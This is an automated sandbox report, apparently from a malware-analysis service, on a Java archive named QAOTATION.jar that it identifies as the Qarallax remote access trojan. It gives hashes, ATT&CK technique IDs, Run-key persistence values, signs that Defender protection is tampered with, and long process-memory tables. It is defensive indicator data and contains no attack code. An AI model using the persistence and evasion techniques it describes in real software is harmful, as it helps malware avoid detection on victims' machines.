qarallax | 3b7e009a2ca84ce2834f422390a85515b80034e4227c05e7522b274e862c7924

Analysis

max time kernel
150s
max time network
150s
platform
windows10_x64
resource
win10v200722
submitted
19-08-2020 13:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

QAOTATION.jar
Size

399KB
MD5

be666fddf4e70621ec1a8fe19348bbc3
SHA1

132069951f67e7bd94cfce57a137b9f82ead15ad
SHA256

3b7e009a2ca84ce2834f422390a85515b80034e4227c05e7522b274e862c7924
SHA512

0ef5796a8bb0913389fefc4c940bd0200189d1227071e6a5a400c55925ee396722fa6107f91f618c9799e339a231ab43a7189378388f0551e2064d2eb9ff62fb

Score

10^/10

evasion trojan persistence qarallax

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
QarallaxRAT
Qarallax is a RAT developed by Quaverse and sold as RaaS (RAT as a Service).
trojan qarallax

Qarallax RAT support DLL 1 IoCs

resource	yara_rule
behavioral2/files/0x000100000001adec-54.dat	qarallax_dll

Sets file execution options in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

Loads dropped DLL 1 IoCs

pid	Process
788	java.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce	java.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\UuvhMEW = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\oWsdf\\MIJPw.class\""	java.exe
Key created	\REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Software\Microsoft\Windows\CurrentVersion\Run	java.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Software\Microsoft\Windows\CurrentVersion\Run\UuvhMEW = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\oWsdf\\MIJPw.class\""	java.exe

Drops desktop.ini file(s) 4 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\oWsdf\Desktop.ini	java.exe
File created	C:\Users\Admin\oWsdf\Desktop.ini	java.exe
File opened for modification	C:\Users\Admin\oWsdf\Desktop.ini	attrib.exe
File opened for modification	C:\Users\Admin\oWsdf\Desktop.ini	attrib.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\System32\dlMRF	java.exe
File opened for modification	C:\Windows\System32\dlMRF	java.exe

Kills process with taskkill 16 IoCs

evasion

pid	Process
2772	taskkill.exe
2480	taskkill.exe
3380	taskkill.exe
4256	taskkill.exe
2936	taskkill.exe
2416	taskkill.exe
4544	taskkill.exe
4916	taskkill.exe
724	taskkill.exe
4396	taskkill.exe
3992	taskkill.exe
3088	taskkill.exe
3896	taskkill.exe
3784	taskkill.exe
3740	taskkill.exe
4128	taskkill.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
3904	powershell.exe
3904	powershell.exe
3904	powershell.exe

Suspicious use of AdjustPrivilegeToken 122 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	4024	WMIC.exe
Token: SeSecurityPrivilege	4024	WMIC.exe
Token: SeTakeOwnershipPrivilege	4024	WMIC.exe
Token: SeLoadDriverPrivilege	4024	WMIC.exe
Token: SeSystemProfilePrivilege	4024	WMIC.exe
Token: SeSystemtimePrivilege	4024	WMIC.exe
Token: SeProfSingleProcessPrivilege	4024	WMIC.exe
Token: SeIncBasePriorityPrivilege	4024	WMIC.exe
Token: SeCreatePagefilePrivilege	4024	WMIC.exe
Token: SeBackupPrivilege	4024	WMIC.exe
Token: SeRestorePrivilege	4024	WMIC.exe
Token: SeShutdownPrivilege	4024	WMIC.exe
Token: SeDebugPrivilege	4024	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4024	WMIC.exe
Token: SeRemoteShutdownPrivilege	4024	WMIC.exe
Token: SeUndockPrivilege	4024	WMIC.exe
Token: SeManageVolumePrivilege	4024	WMIC.exe
Token: 33	4024	WMIC.exe
Token: 34	4024	WMIC.exe
Token: 35	4024	WMIC.exe
Token: 36	4024	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4024	WMIC.exe
Token: SeSecurityPrivilege	4024	WMIC.exe
Token: SeTakeOwnershipPrivilege	4024	WMIC.exe
Token: SeLoadDriverPrivilege	4024	WMIC.exe
Token: SeSystemProfilePrivilege	4024	WMIC.exe
Token: SeSystemtimePrivilege	4024	WMIC.exe
Token: SeProfSingleProcessPrivilege	4024	WMIC.exe
Token: SeIncBasePriorityPrivilege	4024	WMIC.exe
Token: SeCreatePagefilePrivilege	4024	WMIC.exe
Token: SeBackupPrivilege	4024	WMIC.exe
Token: SeRestorePrivilege	4024	WMIC.exe
Token: SeShutdownPrivilege	4024	WMIC.exe
Token: SeDebugPrivilege	4024	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4024	WMIC.exe
Token: SeRemoteShutdownPrivilege	4024	WMIC.exe
Token: SeUndockPrivilege	4024	WMIC.exe
Token: SeManageVolumePrivilege	4024	WMIC.exe
Token: 33	4024	WMIC.exe
Token: 34	4024	WMIC.exe
Token: 35	4024	WMIC.exe
Token: 36	4024	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3160	WMIC.exe
Token: SeSecurityPrivilege	3160	WMIC.exe
Token: SeTakeOwnershipPrivilege	3160	WMIC.exe
Token: SeLoadDriverPrivilege	3160	WMIC.exe
Token: SeSystemProfilePrivilege	3160	WMIC.exe
Token: SeSystemtimePrivilege	3160	WMIC.exe
Token: SeProfSingleProcessPrivilege	3160	WMIC.exe
Token: SeIncBasePriorityPrivilege	3160	WMIC.exe
Token: SeCreatePagefilePrivilege	3160	WMIC.exe
Token: SeBackupPrivilege	3160	WMIC.exe
Token: SeRestorePrivilege	3160	WMIC.exe
Token: SeShutdownPrivilege	3160	WMIC.exe
Token: SeDebugPrivilege	3160	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3160	WMIC.exe
Token: SeRemoteShutdownPrivilege	3160	WMIC.exe
Token: SeUndockPrivilege	3160	WMIC.exe
Token: SeManageVolumePrivilege	3160	WMIC.exe
Token: 33	3160	WMIC.exe
Token: 34	3160	WMIC.exe
Token: 35	3160	WMIC.exe
Token: 36	3160	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3160	WMIC.exe
Token: SeSecurityPrivilege	3160	WMIC.exe
Token: SeTakeOwnershipPrivilege	3160	WMIC.exe
Token: SeLoadDriverPrivilege	3160	WMIC.exe
Token: SeSystemProfilePrivilege	3160	WMIC.exe
Token: SeSystemtimePrivilege	3160	WMIC.exe
Token: SeProfSingleProcessPrivilege	3160	WMIC.exe
Token: SeIncBasePriorityPrivilege	3160	WMIC.exe
Token: SeCreatePagefilePrivilege	3160	WMIC.exe
Token: SeBackupPrivilege	3160	WMIC.exe
Token: SeRestorePrivilege	3160	WMIC.exe
Token: SeShutdownPrivilege	3160	WMIC.exe
Token: SeDebugPrivilege	3160	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3160	WMIC.exe
Token: SeRemoteShutdownPrivilege	3160	WMIC.exe
Token: SeUndockPrivilege	3160	WMIC.exe
Token: SeManageVolumePrivilege	3160	WMIC.exe
Token: 33	3160	WMIC.exe
Token: 34	3160	WMIC.exe
Token: 35	3160	WMIC.exe
Token: 36	3160	WMIC.exe
Token: SeDebugPrivilege	3992	taskkill.exe
Token: SeDebugPrivilege	3904	powershell.exe
Token: SeDebugPrivilege	2936	taskkill.exe
Token: SeDebugPrivilege	3088	taskkill.exe
Token: SeDebugPrivilege	2772	taskkill.exe
Token: SeDebugPrivilege	3896	taskkill.exe
Token: SeIncreaseQuotaPrivilege	3904	powershell.exe
Token: SeSecurityPrivilege	3904	powershell.exe
Token: SeTakeOwnershipPrivilege	3904	powershell.exe
Token: SeLoadDriverPrivilege	3904	powershell.exe
Token: SeSystemProfilePrivilege	3904	powershell.exe
Token: SeSystemtimePrivilege	3904	powershell.exe
Token: SeProfSingleProcessPrivilege	3904	powershell.exe
Token: SeIncBasePriorityPrivilege	3904	powershell.exe
Token: SeCreatePagefilePrivilege	3904	powershell.exe
Token: SeBackupPrivilege	3904	powershell.exe
Token: SeRestorePrivilege	3904	powershell.exe
Token: SeShutdownPrivilege	3904	powershell.exe
Token: SeDebugPrivilege	3904	powershell.exe
Token: SeSystemEnvironmentPrivilege	3904	powershell.exe
Token: SeRemoteShutdownPrivilege	3904	powershell.exe
Token: SeUndockPrivilege	3904	powershell.exe
Token: SeManageVolumePrivilege	3904	powershell.exe
Token: 33	3904	powershell.exe
Token: 34	3904	powershell.exe
Token: 35	3904	powershell.exe
Token: 36	3904	powershell.exe
Token: SeDebugPrivilege	3740	taskkill.exe
Token: SeDebugPrivilege	3784	taskkill.exe
Token: SeDebugPrivilege	4128	taskkill.exe
Token: SeDebugPrivilege	4916	taskkill.exe
Token: SeDebugPrivilege	724	taskkill.exe
Token: SeDebugPrivilege	2480	taskkill.exe
Token: SeDebugPrivilege	3380	taskkill.exe
Token: SeDebugPrivilege	2416	taskkill.exe
Token: SeDebugPrivilege	4256	taskkill.exe
Token: SeDebugPrivilege	4396	taskkill.exe
Token: SeDebugPrivilege	4544	taskkill.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
788	java.exe

Suspicious use of WriteProcessMemory 382 IoCs

description	pid	Process	procid_target
PID 788 wrote to memory of 1820	788	java.exe	68
PID 788 wrote to memory of 1820	788	java.exe	68
PID 788 wrote to memory of 668	788	java.exe	70
PID 788 wrote to memory of 668	788	java.exe	70
PID 668 wrote to memory of 4024	668	cmd.exe	72
PID 668 wrote to memory of 4024	668	cmd.exe	72
PID 788 wrote to memory of 3596	788	java.exe	73
PID 788 wrote to memory of 3596	788	java.exe	73
PID 3596 wrote to memory of 3160	3596	cmd.exe	75
PID 3596 wrote to memory of 3160	3596	cmd.exe	75
PID 788 wrote to memory of 3700	788	java.exe	76
PID 788 wrote to memory of 3700	788	java.exe	76
PID 788 wrote to memory of 2396	788	java.exe	78
PID 788 wrote to memory of 2396	788	java.exe	78
PID 788 wrote to memory of 2788	788	java.exe	80
PID 788 wrote to memory of 2788	788	java.exe	80
PID 788 wrote to memory of 2884	788	java.exe	81
PID 788 wrote to memory of 2884	788	java.exe	81
PID 788 wrote to memory of 3124	788	java.exe	83
PID 788 wrote to memory of 3124	788	java.exe	83
PID 788 wrote to memory of 3784	788	java.exe	85
PID 788 wrote to memory of 3784	788	java.exe	85
PID 788 wrote to memory of 496	788	java.exe	87
PID 788 wrote to memory of 496	788	java.exe	87
PID 788 wrote to memory of 572	788	java.exe	89
PID 788 wrote to memory of 572	788	java.exe	89
PID 788 wrote to memory of 1472	788	java.exe	92
PID 788 wrote to memory of 1472	788	java.exe	92
PID 788 wrote to memory of 3992	788	java.exe	94
PID 788 wrote to memory of 3992	788	java.exe	94
PID 788 wrote to memory of 3904	788	java.exe	95
PID 788 wrote to memory of 3904	788	java.exe	95
PID 788 wrote to memory of 3516	788	java.exe	96
PID 788 wrote to memory of 3516	788	java.exe	96
PID 788 wrote to memory of 3864	788	java.exe	97
PID 788 wrote to memory of 3864	788	java.exe	97
PID 788 wrote to memory of 2468	788	java.exe	101
PID 788 wrote to memory of 2468	788	java.exe	101
PID 788 wrote to memory of 752	788	java.exe	102
PID 788 wrote to memory of 752	788	java.exe	102
PID 788 wrote to memory of 948	788	java.exe	106
PID 788 wrote to memory of 948	788	java.exe	106
PID 788 wrote to memory of 3820	788	java.exe	107
PID 788 wrote to memory of 3820	788	java.exe	107
PID 788 wrote to memory of 2408	788	java.exe	110
PID 788 wrote to memory of 2408	788	java.exe	110
PID 788 wrote to memory of 2348	788	java.exe	111
PID 788 wrote to memory of 2348	788	java.exe	111
PID 788 wrote to memory of 3228	788	java.exe	114
PID 788 wrote to memory of 3228	788	java.exe	114
PID 1472 wrote to memory of 1244	1472	cmd.exe	115
PID 1472 wrote to memory of 1244	1472	cmd.exe	115
PID 788 wrote to memory of 4056	788	java.exe	117
PID 788 wrote to memory of 4056	788	java.exe	117
PID 788 wrote to memory of 3844	788	java.exe	119
PID 788 wrote to memory of 3844	788	java.exe	119
PID 788 wrote to memory of 1236	788	java.exe	121
PID 788 wrote to memory of 1236	788	java.exe	121
PID 788 wrote to memory of 720	788	java.exe	123
PID 788 wrote to memory of 720	788	java.exe	123
PID 788 wrote to memory of 3800	788	java.exe	125
PID 788 wrote to memory of 3800	788	java.exe	125
PID 1472 wrote to memory of 1004	1472	cmd.exe	127
PID 1472 wrote to memory of 1004	1472	cmd.exe	127
PID 788 wrote to memory of 2936	788	java.exe	128
PID 788 wrote to memory of 2936	788	java.exe	128
PID 788 wrote to memory of 4000	788	java.exe	130
PID 788 wrote to memory of 4000	788	java.exe	130
PID 788 wrote to memory of 4032	788	java.exe	133
PID 788 wrote to memory of 4032	788	java.exe	133
PID 788 wrote to memory of 2976	788	java.exe	135
PID 788 wrote to memory of 2976	788	java.exe	135
PID 788 wrote to memory of 1816	788	java.exe	137
PID 788 wrote to memory of 1816	788	java.exe	137
PID 788 wrote to memory of 1404	788	java.exe	139
PID 788 wrote to memory of 1404	788	java.exe	139
PID 788 wrote to memory of 3784	788	java.exe	141
PID 788 wrote to memory of 3784	788	java.exe	141
PID 788 wrote to memory of 4024	788	java.exe	143
PID 788 wrote to memory of 4024	788	java.exe	143
PID 4024 wrote to memory of 3032	4024	cmd.exe	145
PID 4024 wrote to memory of 3032	4024	cmd.exe	145
PID 4024 wrote to memory of 1808	4024	cmd.exe	146
PID 4024 wrote to memory of 1808	4024	cmd.exe	146
PID 788 wrote to memory of 3088	788	java.exe	147
PID 788 wrote to memory of 3088	788	java.exe	147
PID 788 wrote to memory of 2124	788	java.exe	149
PID 788 wrote to memory of 2124	788	java.exe	149
PID 2124 wrote to memory of 3196	2124	cmd.exe	151
PID 2124 wrote to memory of 3196	2124	cmd.exe	151
PID 2124 wrote to memory of 3392	2124	cmd.exe	152
PID 2124 wrote to memory of 3392	2124	cmd.exe	152
PID 788 wrote to memory of 2144	788	java.exe	153
PID 788 wrote to memory of 2144	788	java.exe	153
PID 2144 wrote to memory of 3440	2144	cmd.exe	155
PID 2144 wrote to memory of 3440	2144	cmd.exe	155
PID 2144 wrote to memory of 1004	2144	cmd.exe	156
PID 2144 wrote to memory of 1004	2144	cmd.exe	156
PID 788 wrote to memory of 3704	788	java.exe	157
PID 788 wrote to memory of 3704	788	java.exe	157
PID 788 wrote to memory of 2772	788	java.exe	159
PID 788 wrote to memory of 2772	788	java.exe	159
PID 3704 wrote to memory of 2252	3704	cmd.exe	161
PID 3704 wrote to memory of 2252	3704	cmd.exe	161
PID 3704 wrote to memory of 2484	3704	cmd.exe	162
PID 3704 wrote to memory of 2484	3704	cmd.exe	162
PID 788 wrote to memory of 2788	788	java.exe	163
PID 788 wrote to memory of 2788	788	java.exe	163
PID 2788 wrote to memory of 2304	2788	cmd.exe	165
PID 2788 wrote to memory of 2304	2788	cmd.exe	165
PID 2788 wrote to memory of 1752	2788	cmd.exe	166
PID 2788 wrote to memory of 1752	2788	cmd.exe	166
PID 788 wrote to memory of 484	788	java.exe	167
PID 788 wrote to memory of 484	788	java.exe	167
PID 484 wrote to memory of 2372	484	cmd.exe	169
PID 484 wrote to memory of 2372	484	cmd.exe	169
PID 484 wrote to memory of 4028	484	cmd.exe	170
PID 484 wrote to memory of 4028	484	cmd.exe	170
PID 788 wrote to memory of 2656	788	java.exe	171
PID 788 wrote to memory of 2656	788	java.exe	171
PID 2656 wrote to memory of 668	2656	cmd.exe	173
PID 2656 wrote to memory of 668	2656	cmd.exe	173
PID 2656 wrote to memory of 2424	2656	cmd.exe	174
PID 2656 wrote to memory of 2424	2656	cmd.exe	174
PID 788 wrote to memory of 3876	788	java.exe	175
PID 788 wrote to memory of 3876	788	java.exe	175
PID 3876 wrote to memory of 3740	3876	cmd.exe	177
PID 3876 wrote to memory of 3740	3876	cmd.exe	177
PID 3876 wrote to memory of 3196	3876	cmd.exe	178
PID 3876 wrote to memory of 3196	3876	cmd.exe	178
PID 788 wrote to memory of 3392	788	java.exe	179
PID 788 wrote to memory of 3392	788	java.exe	179
PID 3392 wrote to memory of 3708	3392	cmd.exe	181
PID 3392 wrote to memory of 3708	3392	cmd.exe	181
PID 3392 wrote to memory of 2036	3392	cmd.exe	182
PID 3392 wrote to memory of 2036	3392	cmd.exe	182
PID 788 wrote to memory of 948	788	java.exe	183
PID 788 wrote to memory of 948	788	java.exe	183
PID 788 wrote to memory of 3896	788	java.exe	185
PID 788 wrote to memory of 3896	788	java.exe	185
PID 948 wrote to memory of 1816	948	cmd.exe	187
PID 948 wrote to memory of 1816	948	cmd.exe	187
PID 948 wrote to memory of 2764	948	cmd.exe	188
PID 948 wrote to memory of 2764	948	cmd.exe	188
PID 788 wrote to memory of 1752	788	java.exe	189
PID 788 wrote to memory of 1752	788	java.exe	189
PID 1752 wrote to memory of 3992	1752	cmd.exe	191
PID 1752 wrote to memory of 3992	1752	cmd.exe	191
PID 1752 wrote to memory of 1808	1752	cmd.exe	192
PID 1752 wrote to memory of 1808	1752	cmd.exe	192
PID 788 wrote to memory of 3216	788	java.exe	193
PID 788 wrote to memory of 3216	788	java.exe	193
PID 3216 wrote to memory of 3740	3216	cmd.exe	195
PID 3216 wrote to memory of 3740	3216	cmd.exe	195
PID 3216 wrote to memory of 1708	3216	cmd.exe	196
PID 3216 wrote to memory of 1708	3216	cmd.exe	196
PID 788 wrote to memory of 572	788	java.exe	197
PID 788 wrote to memory of 572	788	java.exe	197
PID 572 wrote to memory of 3700	572	cmd.exe	199
PID 572 wrote to memory of 3700	572	cmd.exe	199
PID 572 wrote to memory of 3096	572	cmd.exe	200
PID 572 wrote to memory of 3096	572	cmd.exe	200
PID 788 wrote to memory of 4056	788	java.exe	201
PID 788 wrote to memory of 4056	788	java.exe	201
PID 4056 wrote to memory of 3900	4056	cmd.exe	203
PID 4056 wrote to memory of 3900	4056	cmd.exe	203
PID 4056 wrote to memory of 2144	4056	cmd.exe	204
PID 4056 wrote to memory of 2144	4056	cmd.exe	204
PID 788 wrote to memory of 3028	788	java.exe	206
PID 788 wrote to memory of 3028	788	java.exe	206
PID 3028 wrote to memory of 2392	3028	cmd.exe	208
PID 3028 wrote to memory of 2392	3028	cmd.exe	208
PID 3028 wrote to memory of 1716	3028	cmd.exe	209
PID 3028 wrote to memory of 1716	3028	cmd.exe	209
PID 788 wrote to memory of 3748	788	java.exe	210
PID 788 wrote to memory of 3748	788	java.exe	210
PID 3748 wrote to memory of 3052	3748	cmd.exe	212
PID 3748 wrote to memory of 3052	3748	cmd.exe	212
PID 3748 wrote to memory of 620	3748	cmd.exe	213
PID 3748 wrote to memory of 620	3748	cmd.exe	213
PID 788 wrote to memory of 1400	788	java.exe	214
PID 788 wrote to memory of 1400	788	java.exe	214
PID 1400 wrote to memory of 2296	1400	cmd.exe	216
PID 1400 wrote to memory of 2296	1400	cmd.exe	216
PID 1400 wrote to memory of 3992	1400	cmd.exe	217
PID 1400 wrote to memory of 3992	1400	cmd.exe	217
PID 788 wrote to memory of 3100	788	java.exe	218
PID 788 wrote to memory of 3100	788	java.exe	218
PID 788 wrote to memory of 3740	788	java.exe	220
PID 788 wrote to memory of 3740	788	java.exe	220
PID 3100 wrote to memory of 3300	3100	cmd.exe	222
PID 3100 wrote to memory of 3300	3100	cmd.exe	222
PID 3100 wrote to memory of 3988	3100	cmd.exe	223
PID 3100 wrote to memory of 3988	3100	cmd.exe	223
PID 788 wrote to memory of 724	788	java.exe	224
PID 788 wrote to memory of 724	788	java.exe	224
PID 724 wrote to memory of 732	724	cmd.exe	226
PID 724 wrote to memory of 732	724	cmd.exe	226
PID 724 wrote to memory of 2764	724	cmd.exe	227
PID 724 wrote to memory of 2764	724	cmd.exe	227
PID 788 wrote to memory of 620	788	java.exe	228
PID 788 wrote to memory of 620	788	java.exe	228
PID 620 wrote to memory of 3992	620	cmd.exe	230
PID 620 wrote to memory of 3992	620	cmd.exe	230
PID 620 wrote to memory of 3064	620	cmd.exe	231
PID 620 wrote to memory of 3064	620	cmd.exe	231
PID 788 wrote to memory of 2124	788	java.exe	232
PID 788 wrote to memory of 2124	788	java.exe	232
PID 2124 wrote to memory of 1404	2124	cmd.exe	234
PID 2124 wrote to memory of 1404	2124	cmd.exe	234
PID 2124 wrote to memory of 3720	2124	cmd.exe	235
PID 2124 wrote to memory of 3720	2124	cmd.exe	235
PID 788 wrote to memory of 4032	788	java.exe	236
PID 788 wrote to memory of 4032	788	java.exe	236
PID 4032 wrote to memory of 488	4032	cmd.exe	238
PID 4032 wrote to memory of 488	4032	cmd.exe	238
PID 4032 wrote to memory of 1776	4032	cmd.exe	239
PID 4032 wrote to memory of 1776	4032	cmd.exe	239
PID 788 wrote to memory of 3196	788	java.exe	240
PID 788 wrote to memory of 3196	788	java.exe	240
PID 3196 wrote to memory of 1480	3196	cmd.exe	242
PID 3196 wrote to memory of 1480	3196	cmd.exe	242
PID 3196 wrote to memory of 3516	3196	cmd.exe	243
PID 3196 wrote to memory of 3516	3196	cmd.exe	243
PID 788 wrote to memory of 3964	788	java.exe	244
PID 788 wrote to memory of 3964	788	java.exe	244
PID 3964 wrote to memory of 4000	3964	cmd.exe	246
PID 3964 wrote to memory of 4000	3964	cmd.exe	246
PID 3964 wrote to memory of 496	3964	cmd.exe	247
PID 3964 wrote to memory of 496	3964	cmd.exe	247
PID 788 wrote to memory of 2392	788	java.exe	248
PID 788 wrote to memory of 2392	788	java.exe	248
PID 788 wrote to memory of 3784	788	java.exe	249
PID 788 wrote to memory of 3784	788	java.exe	249
PID 2392 wrote to memory of 3836	2392	cmd.exe	252
PID 2392 wrote to memory of 3836	2392	cmd.exe	252
PID 2392 wrote to memory of 4004	2392	cmd.exe	253
PID 2392 wrote to memory of 4004	2392	cmd.exe	253
PID 788 wrote to memory of 3788	788	java.exe	254
PID 788 wrote to memory of 3788	788	java.exe	254
PID 3788 wrote to memory of 3848	3788	cmd.exe	256
PID 3788 wrote to memory of 3848	3788	cmd.exe	256
PID 3788 wrote to memory of 2976	3788	cmd.exe	257
PID 3788 wrote to memory of 2976	3788	cmd.exe	257
PID 788 wrote to memory of 2300	788	java.exe	258
PID 788 wrote to memory of 2300	788	java.exe	258
PID 2300 wrote to memory of 3048	2300	cmd.exe	260
PID 2300 wrote to memory of 3048	2300	cmd.exe	260
PID 2300 wrote to memory of 3516	2300	cmd.exe	261
PID 2300 wrote to memory of 3516	2300	cmd.exe	261
PID 788 wrote to memory of 496	788	java.exe	262
PID 788 wrote to memory of 496	788	java.exe	262
PID 496 wrote to memory of 488	496	cmd.exe	264
PID 496 wrote to memory of 488	496	cmd.exe	264
PID 496 wrote to memory of 2040	496	cmd.exe	265
PID 496 wrote to memory of 2040	496	cmd.exe	265
PID 788 wrote to memory of 3700	788	java.exe	266
PID 788 wrote to memory of 3700	788	java.exe	266
PID 3700 wrote to memory of 4004	3700	cmd.exe	268
PID 3700 wrote to memory of 4004	3700	cmd.exe	268
PID 3700 wrote to memory of 2040	3700	cmd.exe	269
PID 3700 wrote to memory of 2040	3700	cmd.exe	269
PID 788 wrote to memory of 2152	788	java.exe	270
PID 788 wrote to memory of 2152	788	java.exe	270
PID 2152 wrote to memory of 3516	2152	cmd.exe	272
PID 2152 wrote to memory of 3516	2152	cmd.exe	272
PID 2152 wrote to memory of 4116	2152	cmd.exe	273
PID 2152 wrote to memory of 4116	2152	cmd.exe	273
PID 788 wrote to memory of 4128	788	java.exe	274
PID 788 wrote to memory of 4128	788	java.exe	274
PID 788 wrote to memory of 4188	788	java.exe	276
PID 788 wrote to memory of 4188	788	java.exe	276
PID 4188 wrote to memory of 4236	4188	cmd.exe	278
PID 4188 wrote to memory of 4236	4188	cmd.exe	278
PID 4188 wrote to memory of 4256	4188	cmd.exe	279
PID 4188 wrote to memory of 4256	4188	cmd.exe	279
PID 788 wrote to memory of 4276	788	java.exe	280
PID 788 wrote to memory of 4276	788	java.exe	280
PID 4276 wrote to memory of 4312	4276	cmd.exe	282
PID 4276 wrote to memory of 4312	4276	cmd.exe	282
PID 4276 wrote to memory of 4332	4276	cmd.exe	283
PID 4276 wrote to memory of 4332	4276	cmd.exe	283
PID 788 wrote to memory of 4352	788	java.exe	284
PID 788 wrote to memory of 4352	788	java.exe	284
PID 4352 wrote to memory of 4388	4352	cmd.exe	286
PID 4352 wrote to memory of 4388	4352	cmd.exe	286
PID 4352 wrote to memory of 4408	4352	cmd.exe	287
PID 4352 wrote to memory of 4408	4352	cmd.exe	287
PID 788 wrote to memory of 4428	788	java.exe	288
PID 788 wrote to memory of 4428	788	java.exe	288
PID 4428 wrote to memory of 4464	4428	cmd.exe	290
PID 4428 wrote to memory of 4464	4428	cmd.exe	290
PID 4428 wrote to memory of 4484	4428	cmd.exe	291
PID 4428 wrote to memory of 4484	4428	cmd.exe	291
PID 788 wrote to memory of 4504	788	java.exe	292
PID 788 wrote to memory of 4504	788	java.exe	292
PID 4504 wrote to memory of 4540	4504	cmd.exe	294
PID 4504 wrote to memory of 4540	4504	cmd.exe	294
PID 4504 wrote to memory of 4560	4504	cmd.exe	295
PID 4504 wrote to memory of 4560	4504	cmd.exe	295
PID 788 wrote to memory of 4580	788	java.exe	296
PID 788 wrote to memory of 4580	788	java.exe	296
PID 4580 wrote to memory of 4616	4580	cmd.exe	298
PID 4580 wrote to memory of 4616	4580	cmd.exe	298
PID 4580 wrote to memory of 4636	4580	cmd.exe	299
PID 4580 wrote to memory of 4636	4580	cmd.exe	299
PID 788 wrote to memory of 4656	788	java.exe	300
PID 788 wrote to memory of 4656	788	java.exe	300
PID 4656 wrote to memory of 4692	4656	cmd.exe	302
PID 4656 wrote to memory of 4692	4656	cmd.exe	302
PID 4656 wrote to memory of 4712	4656	cmd.exe	303
PID 4656 wrote to memory of 4712	4656	cmd.exe	303
PID 788 wrote to memory of 4732	788	java.exe	304
PID 788 wrote to memory of 4732	788	java.exe	304
PID 4732 wrote to memory of 4768	4732	cmd.exe	306
PID 4732 wrote to memory of 4768	4732	cmd.exe	306
PID 4732 wrote to memory of 4788	4732	cmd.exe	307
PID 4732 wrote to memory of 4788	4732	cmd.exe	307
PID 788 wrote to memory of 4808	788	java.exe	308
PID 788 wrote to memory of 4808	788	java.exe	308
PID 4808 wrote to memory of 4844	4808	cmd.exe	310
PID 4808 wrote to memory of 4844	4808	cmd.exe	310
PID 4808 wrote to memory of 4864	4808	cmd.exe	311
PID 4808 wrote to memory of 4864	4808	cmd.exe	311
PID 788 wrote to memory of 4884	788	java.exe	312
PID 788 wrote to memory of 4884	788	java.exe	312
PID 788 wrote to memory of 4916	788	java.exe	314
PID 788 wrote to memory of 4916	788	java.exe	314
PID 4884 wrote to memory of 4944	4884	cmd.exe	316
PID 4884 wrote to memory of 4944	4884	cmd.exe	316
PID 4884 wrote to memory of 4980	4884	cmd.exe	317
PID 4884 wrote to memory of 4980	4884	cmd.exe	317
PID 788 wrote to memory of 5004	788	java.exe	318
PID 788 wrote to memory of 5004	788	java.exe	318
PID 5004 wrote to memory of 5052	5004	cmd.exe	320
PID 5004 wrote to memory of 5052	5004	cmd.exe	320
PID 5004 wrote to memory of 5076	5004	cmd.exe	321
PID 5004 wrote to memory of 5076	5004	cmd.exe	321
PID 788 wrote to memory of 5092	788	java.exe	322
PID 788 wrote to memory of 5092	788	java.exe	322
PID 5092 wrote to memory of 4112	5092	cmd.exe	324
PID 5092 wrote to memory of 4112	5092	cmd.exe	324
PID 5092 wrote to memory of 4140	5092	cmd.exe	325
PID 5092 wrote to memory of 4140	5092	cmd.exe	325
PID 788 wrote to memory of 400	788	java.exe	326
PID 788 wrote to memory of 400	788	java.exe	326
PID 400 wrote to memory of 4000	400	cmd.exe	328
PID 400 wrote to memory of 4000	400	cmd.exe	328
PID 400 wrote to memory of 3704	400	cmd.exe	329
PID 400 wrote to memory of 3704	400	cmd.exe	329
PID 788 wrote to memory of 3336	788	java.exe	330
PID 788 wrote to memory of 3336	788	java.exe	330
PID 3336 wrote to memory of 3608	3336	cmd.exe	332
PID 3336 wrote to memory of 3608	3336	cmd.exe	332
PID 3336 wrote to memory of 2772	3336	cmd.exe	333
PID 3336 wrote to memory of 2772	3336	cmd.exe	333
PID 788 wrote to memory of 1372	788	java.exe	334
PID 788 wrote to memory of 1372	788	java.exe	334
PID 1372 wrote to memory of 3880	1372	cmd.exe	336
PID 1372 wrote to memory of 3880	1372	cmd.exe	336
PID 1372 wrote to memory of 3708	1372	cmd.exe	337
PID 1372 wrote to memory of 3708	1372	cmd.exe	337
PID 788 wrote to memory of 1884	788	java.exe	338
PID 788 wrote to memory of 1884	788	java.exe	338
PID 1884 wrote to memory of 3700	1884	cmd.exe	340
PID 1884 wrote to memory of 3700	1884	cmd.exe	340
PID 1884 wrote to memory of 3964	1884	cmd.exe	341
PID 1884 wrote to memory of 3964	1884	cmd.exe	341
PID 788 wrote to memory of 724	788	java.exe	342
PID 788 wrote to memory of 724	788	java.exe	342
PID 788 wrote to memory of 2480	788	java.exe	344
PID 788 wrote to memory of 2480	788	java.exe	344
PID 788 wrote to memory of 3380	788	java.exe	346
PID 788 wrote to memory of 3380	788	java.exe	346
PID 788 wrote to memory of 2416	788	java.exe	348
PID 788 wrote to memory of 2416	788	java.exe	348
PID 788 wrote to memory of 4256	788	java.exe	352
